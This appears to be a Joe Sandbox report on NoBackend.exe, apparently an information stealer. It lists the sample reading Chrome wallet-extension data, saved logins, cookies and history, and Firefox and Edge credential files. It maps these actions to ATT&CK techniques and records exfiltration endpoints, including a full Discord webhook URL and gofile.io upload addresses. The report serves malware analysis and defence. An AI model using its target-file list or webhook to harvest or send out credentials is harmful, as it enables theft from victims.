Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\agoakfejjabomempkjlepdflaleeobhb	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\yiaxs5ej.default\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\eigblbgjknlfbajkfhopmcojidlgcehm	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aodkkagnadcbobfpggfnjeongemjbjca	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mfgccjchihfkkindfppnaooecgfneiii	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jblndlipeogpafnldhgmapagcccfchpi	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnnegphlobjdpkhecapkijjdkgcjhkib	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\Desktop\NoBackend.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk	Jump to behavior

Source: Yara match

File source: Process Memory Space: NoBackend.exe PID: 5636, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	2 Command and Scripting Interpreter	Path Interception	Path Interception	1 Modify Registry	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Software Packing	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	3 Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	Traffic Duplication	Protocol Impersonation			Data Destruction	Virtual Private Server	Employee Names

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://discord.com/api/v8/users/	0%	Avira URL Cloud	safe
https://gofile.iok	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObP	0%	Avira URL Cloud	safe
https://api.gapple.pw/cors/profile/2006-01-02T15:04:05.999999999Z07:00177635683940025046467781066894	0%	Avira URL Cloud	safe
https://goCreateFile/dev/stdin12207031256103515625ParseFloatcomplex128t.Kind	0%	Avira URL Cloud	safe
https://discord.com/api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObPc8eb4Yo7KHhtquCjXx344	0%	Avira URL Cloud	safe
https://apiv2.gokian	0%	Avira URL Cloud	safe
https://discord.com/api/v6/users/	0%	Avira URL Cloud	safe
https://gofile.iokapiv2.gofile.io:443apiv2.gofile.io:443tcpapiv2.gofile.iohttps://apiv2.gofile.ioloo	0%	Avira URL Cloud	safe
https://discord.com/api/v8/guilds/%s/i	0%	Avira URL Cloud	safe
https://%s.go%s/uploadFileinvalid	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
store4.gofile.io	31.14.70.245	true	false	high
discord.com	162.159.136.232	true	false	unknown
apiv2.gofile.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://discord.com/api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObPc8eb4Yo7KHhtquCjXx344	false	Avira URL Cloud: safe	unknown
https://store4.gofile.io/uploadFile	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gofile.io/d/6uo6Pz	NoBackend.exe, 00000000.00000002.2076774521.000000C00040E000.00000004.00001000.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gofile.iok	NoBackend.exe, 00000000.00000002.2073335904.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://discord.com/api/webhooks/1172270413225660506/VdkSArCf5XQSdMw_8XT8p0tZufBvp2m7IFjyTK4cbnGOObP	NoBackend.exe	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://cdn.discordapp.com/avatars/%s/%s.gifhttps://cdn.discordapp.com/avatars/%s/%s.pngmult128bitPo	NoBackend.exe	false		high
https://discord.com/api/v8/guilds/%s/i	NoBackend.exe	false	Avira URL Cloud: safe	unknown
https://gofile.io/d/6uo6Pzeveldb	NoBackend.exe, 00000000.00000002.2073335904.000000C00010C000.00000004.00001000.00020000.00000000.sdmp	false		high
https://discord.com/api/v6/users/	NoBackend.exe	false	Avira URL Cloud: safe	unknown
https://i.ibb.co/hVY5sGg/logo.png	NoBackend.exe, 00000000.00000002.2076962939.000000C000480000.00000004.00001000.00020000.00000000.sdmp	false		high
https://apiv2.gokian	NoBackend.exe	false	Avira URL Cloud: safe	unknown
https://apiv2.gofile.io/getServer	NoBackend.exe, 00000000.00000002.2073335904.000000C0000EC000.00000004.00001000.00020000.00000000.sdmp	false		high
https://discord.com/api/v8/users/	NoBackend.exe	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://goCreateFile/dev/stdin12207031256103515625ParseFloatcomplex128t.Kind	NoBackend.exe	false	Avira URL Cloud: safe	low
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gofile.io/uploadFiles	NoBackend.exe, 00000000.00000002.2073335904.000000C000092000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gofile.iokapiv2.gofile.io:443apiv2.gofile.io:443tcpapiv2.gofile.iohttps://apiv2.gofile.ioloo	NoBackend.exe, 00000000.00000002.2073335904.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://www.ecosia.org/newtab/	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://youtu.be/dQw4w9WgXcQfailed	NoBackend.exe	false		high
https://ac.ecosia.org/autocomplete?q=	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://apiv2.gofile.io/getServerGet	NoBackend.exe, 00000000.00000002.2073335904.000000C0000B2000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gofile.io/d/6uo6Pz)	NoBackend.exe, 00000000.00000002.2073335904.000000C000114000.00000004.00001000.00020000.00000000.sdmp, NoBackend.exe, 00000000.00000002.2073335904.000000C00015A000.00000004.00001000.00020000.00000000.sdmp, NoBackend.exe, 00000000.00000002.2073335904.000000C000102000.00000004.00001000.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.gapple.pw/cors/profile/2006-01-02T15:04:05.999999999Z07:00177635683940025046467781066894	NoBackend.exe	false	Avira URL Cloud: safe	unknown
https://apiv2.gofile.io	NoBackend.exe, 00000000.00000002.2073335904.000000C0000AA000.00000004.00001000.00020000.00000000.sdmp	false		high
https://discord.com/api/v9/users/	NoBackend.exe	false	Avira URL Cloud: safe	unknown
https://store4.gofile.io/uploadFile/store4.gofile.io	NoBackend.exe, 00000000.00000002.2073335904.000000C0000B2000.00000004.00001000.00020000.00000000.sdmp	false		high
https://%s.go%s/uploadFileinvalid	NoBackend.exe	false	Avira URL Cloud: safe	low
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	NoBackend.exe, 00000000.00000002.2073335904.000000C000348000.00000004.00001000.00020000.00000000.sdmp	false		high
https://apiv2.gofile.io/getServeraldi/User	NoBackend.exe, 00000000.00000002.2073335904.000000C0000B2000.00000004.00001000.00020000.00000000.sdmp	false		high
https://i.ibb.co/hVY5sGg/logo.png/Google/Chrome	NoBackend.exe	false		high
https://gofile.io/d/	NoBackend.exe, 00000000.00000002.2073335904.000000C000102000.00000004.00001000.00020000.00000000.sdmp, NoBackend.exe, 00000000.00000002.2076962939.000000C000480000.00000004.00001000.00020000.00000000.sdmp	false		high
https://store4.gofile.io/uploadFile/	NoBackend.exe, 00000000.00000002.2073335904.000000C0000B2000.00000004.00001000.00020000.00000000.sdmp	false		high
https://gofile.io/uploadFilesapiv2.gofile.ioQ	NoBackend.exe, 00000000.00000002.2073335904.000000C000092000.00000004.00001000.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.159.136.232	discord.com	United States		13335	CLOUDFLARENETUS	false
31.14.70.245	store4.gofile.io	Virgin Islands (BRITISH)		199483	LINKER-ASFR	false

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1340072
Start date and time:	2023-11-09 23:22:07 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 58s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	NoBackend.exe
Detection:	MAL
Classification:	mal56.spyw.evad.winEXE@1/6@3/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 56
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: NoBackend.exe

Simulations

Behavior and APIs

⊘No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
162.159.136.232	Nota_de_credito.exe	Get hash	malicious	AgentTesla	Browse
	PO_4500188776.exe	Get hash	malicious	AgentTesla	Browse
	DUrtA5NJvAcOoYZ.exe	Get hash	malicious	AgentTesla	Browse
	http://statspixel.com	Get hash	malicious	Unknown	Browse
	H#U00f3a_#U0111#U01a1n_Proforma_10042023-pdf.exe	Get hash	malicious	AgentTesla	Browse
	Price_and_Quotation_List.exe	Get hash	malicious	AgentTesla	Browse
	Yeni_sipari#U015f.exe	Get hash	malicious	AgentTesla	Browse
	DHL_#Ucd5c#Uc885_#Uc120#Ud558#Uc99d#Uad8c_175955...exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.Win32.PWSX-gen.9313.20821.exe	Get hash	malicious	AgentTesla	Browse
	FedEx_AWB#50931274643.exe	Get hash	malicious	AgentTesla	Browse
	Quotation_for_API_5L_GR_B_ERW.exe	Get hash	malicious	AgentTesla	Browse
	download.exe	Get hash	malicious	AgentTesla	Browse
	2h6TsqwTU9.exe	Get hash	malicious	Exela Stealer	Browse
	FedEx_AWB#51931274643.exe	Get hash	malicious	AgentTesla	Browse
	Yeni_sipari#U015f.exe	Get hash	malicious	AgentTesla	Browse
	INV.0817,_0823_&_0915.exe	Get hash	malicious	AgentTesla	Browse
	z848dVbapXSmbEda9o.exe	Get hash	malicious	AgentTesla	Browse
	Sipari#U015f_Formu_-_SP1020-2.exe	Get hash	malicious	AgentTesla	Browse
	thong_bao_hang_den_20233_2414458944.exe	Get hash	malicious	AgentTesla	Browse
	E-DEKONT1,DOC.exe	Get hash	malicious	AgentTesla, RedLine	Browse
31.14.70.245	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse
	c0PZAXHMCpdh5F1.exe	Get hash	malicious	Clipboard Hijacker, Redline Clipper, Stealerium	Browse
	5a7TEjoYQp.exe	Get hash	malicious	Xmrig	Browse
	wins9c8hG6.exe	Get hash	malicious	Raccoon Stealer v2, Xmrig	Browse
	GameInject.exe	Get hash	malicious	Xmrig	Browse
	KfpMPicGie.exe	Get hash	malicious	RedLine, Xmrig	Browse
	Install.exe	Get hash	malicious	RedLine, Xmrig	Browse
	a79qM8CfJQ.exe	Get hash	malicious	RedLine, Xmrig	Browse
	6F8D6E43D0D509A1223346B2F29E4E775384A4CB15A7AB1CF3AC702A772F73D7_noOVL.exe	Get hash	malicious	RedLine, Xmrig	Browse
	v6aF6opW6c.exe	Get hash	malicious	RedLine, Xmrig	Browse
	jF6G4Ur9fw.exe	Get hash	malicious	RedLine, SmokeLoader, Xmrig	Browse
	conhost.exe	Get hash	malicious	Xmrig	Browse
	setup.exe	Get hash	malicious	RedLine, Xmrig	Browse
	E9IOqND6ov.exe	Get hash	malicious	Xmrig	Browse
	9844_1647755927_4424.exe	Get hash	malicious	Xmrig	Browse
	35344724.exe	Get hash	malicious	Xmrig	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
discord.com	2023-11_CV_Forner_Eugenia.exe	Get hash	malicious	AgentTesla	Browse	162.159.138.232
	AWB_5032675620.exe	Get hash	malicious	AgentTesla	Browse	162.159.128.233
	Nota_de_credito.exe	Get hash	malicious	AgentTesla	Browse	162.159.128.233
	Proforma_Invoice_and_purchase_order-pdf.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	Final_Shipping_Documents.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	Nota_de_credito.exe	Get hash	malicious	AgentTesla	Browse	162.159.136.232
	Adamx_Tweaking_Utility_Version_10.04.23.exe	Get hash	malicious	Creal Stealer	Browse	162.159.128.233
	PO_4500188776.exe	Get hash	malicious	AgentTesla	Browse	162.159.136.232
	payment_confirmation.pdf.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	POfdp.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	COSCO_DN_5874_fdp.exe	Get hash	malicious	AgentTesla	Browse	162.159.135.232
	RC7.exe	Get hash	malicious	Blank Grabber	Browse	162.159.135.232
	04251452615625625.exe	Get hash	malicious	AgentTesla	Browse	162.159.128.233
	Payment_Copy_(Swift-TT).xls.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	hwASvuKtNVNBQwu.exe	Get hash	malicious	AgentTesla	Browse	162.159.137.232
	DUrtA5NJvAcOoYZ.exe	Get hash	malicious	AgentTesla	Browse	162.159.136.232
	http://statspixel.com	Get hash	malicious	Unknown	Browse	162.159.136.232
	vZFGXiTg6o.exe	Get hash	malicious	AsyncRAT, StormKitty, VenomRAT	Browse	162.159.128.233
	xPOlzeOTDQF15ri.exe	Get hash	malicious	AgentTesla	Browse	162.159.128.233
	Halkbank_Ekstre_20230426_075819_154055.exe	Get hash	malicious	AgentTesla	Browse	162.159.128.233
store4.gofile.io	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
	c0PZAXHMCpdh5F1.exe	Get hash	malicious	Clipboard Hijacker, Redline Clipper, Stealerium	Browse	31.14.70.245
	5a7TEjoYQp.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	wins9c8hG6.exe	Get hash	malicious	Raccoon Stealer v2, Xmrig	Browse	31.14.70.245
	GameInject.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	KfpMPicGie.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	Install.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	a79qM8CfJQ.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	6F8D6E43D0D509A1223346B2F29E4E775384A4CB15A7AB1CF3AC702A772F73D7_noOVL.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	v6aF6opW6c.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	jF6G4Ur9fw.exe	Get hash	malicious	RedLine, SmokeLoader, Xmrig	Browse	31.14.70.245
	conhost.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	setup.exe	Get hash	malicious	RedLine, Xmrig	Browse	31.14.70.245
	E9IOqND6ov.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	9844_1647755927_4424.exe	Get hash	malicious	Xmrig	Browse	31.14.70.245
	uOItzWogCB.exe	Get hash	malicious	RedLine	Browse	31.14.70.245
	43234607.exe	Get hash	malicious	AsyncRAT RedLine	Browse	31.14.70.245
	40905558.exe	Get hash	malicious	RedLine	Browse	31.14.70.245
	31201672.exe	Get hash	malicious	RedLine	Browse	31.14.70.245
	16440147.exe	Get hash	malicious	RedLine	Browse	31.14.70.245

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
LINKER-ASFR	VIsIEy7WTH.exe	Get hash	malicious	Amadey, Healer AV Disabler, Mystic Stealer, RedLine	Browse	31.14.70.246
	99XHdEqF5W.exe	Get hash	malicious	Amadey, Healer AV Disabler, Mystic Stealer, RedLine	Browse	31.14.70.246
	Microsoft_Teams_SC.ba#.bat	Get hash	malicious	Unknown	Browse	31.14.70.245
	System.exe	Get hash	malicious	Unknown	Browse	31.14.70.242
	7c.exe	Get hash	malicious	AsyncRAT, Blank Grabber, Clipboard Hijacker, EICAR, StormKitty, ToxicEye, WorldWind Stealer	Browse	31.14.70.247
	HP_Mouse_USB.exe	Get hash	malicious	Stealerium	Browse	31.14.70.247
	04451999.exe.lnk	Get hash	malicious	Unknown	Browse	31.14.70.243
	f2wWJWlU2B.exe	Get hash	malicious	Clipboard Hijacker, Stealerium	Browse	31.14.70.247
	y9iR4Unkvd.exe	Get hash	malicious	SmokeLoader	Browse	31.14.70.242
	XxogfMIH1M.exe	Get hash	malicious	SmokeLoader	Browse	31.14.70.242
	c0PZAXHMCpdh5F1.exe	Get hash	malicious	Clipboard Hijacker, Redline Clipper, Stealerium	Browse	31.14.70.245
	Neus Setup.exe	Get hash	malicious	Unknown	Browse	31.14.70.247
	Setup.exe	Get hash	malicious	Vidar, Xmrig	Browse	31.14.70.242
	CC Checker AcTeam.exe	Get hash	malicious	Clipboard Hijacker, Stealerium	Browse	31.14.70.243
	XZdImqRrwQ.exe	Get hash	malicious	Unknown	Browse	31.14.70.243
	build.exe	Get hash	malicious	Clipboard Hijacker, Stealerium	Browse	31.14.70.246
	ben.exe	Get hash	malicious	Unknown	Browse	31.14.70.242
	RjcTKuW7es.exe	Get hash	malicious	DarkTortilla, Djvu, Fabookie, RHADAMANTHYS, RedLine, SmokeLoader	Browse	31.14.70.254
	file.exe	Get hash	malicious	DanaBot, Fabookie, RedLine, SmokeLoader	Browse	31.14.70.247
	file.exe	Get hash	malicious	DanaBot, Fabookie, RedLine, SmokeLoader	Browse	31.14.70.247
CLOUDFLARENETUS	FS_10.23.HTM	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	Remittance Advice B0284.HTML	Get hash	malicious	HTMLPhisher	Browse	172.67.200.249
	Microsoft_Edge.lnk	Get hash	malicious	Unknown	Browse	172.64.41.3
	Counter_Strike2_CHEAT.exe	Get hash	malicious	Unknown	Browse	172.64.41.3
